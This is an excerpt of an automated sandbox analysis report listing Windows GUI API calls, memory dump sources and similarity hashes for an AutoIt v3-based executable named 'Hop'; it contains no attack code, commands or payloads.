                                                                                                                                                                                                                                                                                                          • FillRect.USER32(?,?,?,?,?,00000000), ref: 00007FF68C4DF267
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,?,?,?,?,00000000), ref: 00007FF68C4DF286
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,?,?,?,00000000), ref: 00007FF68C4DF2D3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF45F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF46A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF485
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF498
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4C3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4DA
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4EB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4FB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF50E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF535
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF561
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4DF418: GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF56F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3521893082-0
APIs
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF45F
• SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF46A
• GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF485
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF498
• CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4A2
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4C3
• CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4DA
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4EB
• SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF4FB
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF50E
• InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF535
• RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF561
• GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF56F
• SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF5BC
• GetWindowTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF5F4
• InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF617
• DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF625
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF634
• SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF63F
• DrawTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF65D
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF67B
• DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF689
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF697
• DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF6A2
• SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF6AE
• SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C4DF0F0), ref: 00007FF68C4DF6BE
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
• Instruction ID: 8621af9f8baa88c679d1e3d4de77db066d3ff3f6df2070fff11720484c1c51e5
• Opcode Fuzzy Hash: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
• Instruction Fuzzy Hash: 39719176A08A41C6E724DB61A84467A7361FF88BB8F014338EE5E87B94DF3CD484CB00
APIs
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
Similarity
• API ID: Color$LongWindow$ModeObjectStockText
• String ID:
• API String ID: 554392163-0
• Opcode ID: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
• Instruction ID: f090c54ff9fd296520159d0accf1f0bfdd0e0d178d2b7b2af5550e2421109590
• Opcode Fuzzy Hash: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
• Instruction Fuzzy Hash: ED810471E0C656C1FB30CB38A44867923A1FF89B68F554239D99E876E5DE3CA8C2D700
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 2091158083-3440237614
• Opcode ID: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
• Instruction ID: 37bbac3029131a15e23169fcc286c1a4818ec0bdd7ae740385bfbda9d3cf4838
• Opcode Fuzzy Hash: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
• Instruction Fuzzy Hash: 9D716272618A82D6EB10DF25E8547ED7761FF84798F804036EA4E87A99DFBCD189C700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                                                                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                          • API String ID: 258715311-1154884017
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2779716855-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                                                                                                                          • API String ID: 0-3931177956
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                          • API String ID: 0-2785691316
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 1460738036-3110715001
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LoadStringwprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                          • API String ID: 3297454147-3080491070
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                          • API String ID: 4051287042-2268648507
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1974058525-0
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 1268354404-3110715001
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
Similarity
• API ID: LoadStringwprintf
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
Similarity
• API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
• String ID: static
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
Similarity
• API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\Include\
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000001,00007FF68C47BC28,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF68C43475D), ref: 00007FF68C4A7CE6
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF68C43475D,?,00007FF68C433C00), ref: 00007FF68C4A7D00
                                                                                                                                                                                                                                                                                                          • wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF68C4A7D43
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF68C43475D,?,00007FF68C433C00), ref: 00007FF68C4A7DD7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                          • API String ID: 4007322891-4153970271
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                          • API String ID: 2914291525-2659433951
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C432794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF68C47A57D), ref: 00007FF68C4327B1
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E156E
                                                                                                                                                                                                                                                                                                          • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E157F
                                                                                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E158C
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E16C3
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E16E1
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E16F6
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E1731
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E177C
                                                                                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32 ref: 00007FF68C4E17B3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4E02A8: IsWindow.USER32(?,?,?,?,?,?,?,?,?,00007FF68C47A2D7), ref: 00007FF68C4E036D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4E02A8: IsWindowEnabled.USER32(?,?,?,?,?,?,?,?,?,00007FF68C47A2D7), ref: 00007FF68C4E037A
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68C4E17EA
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
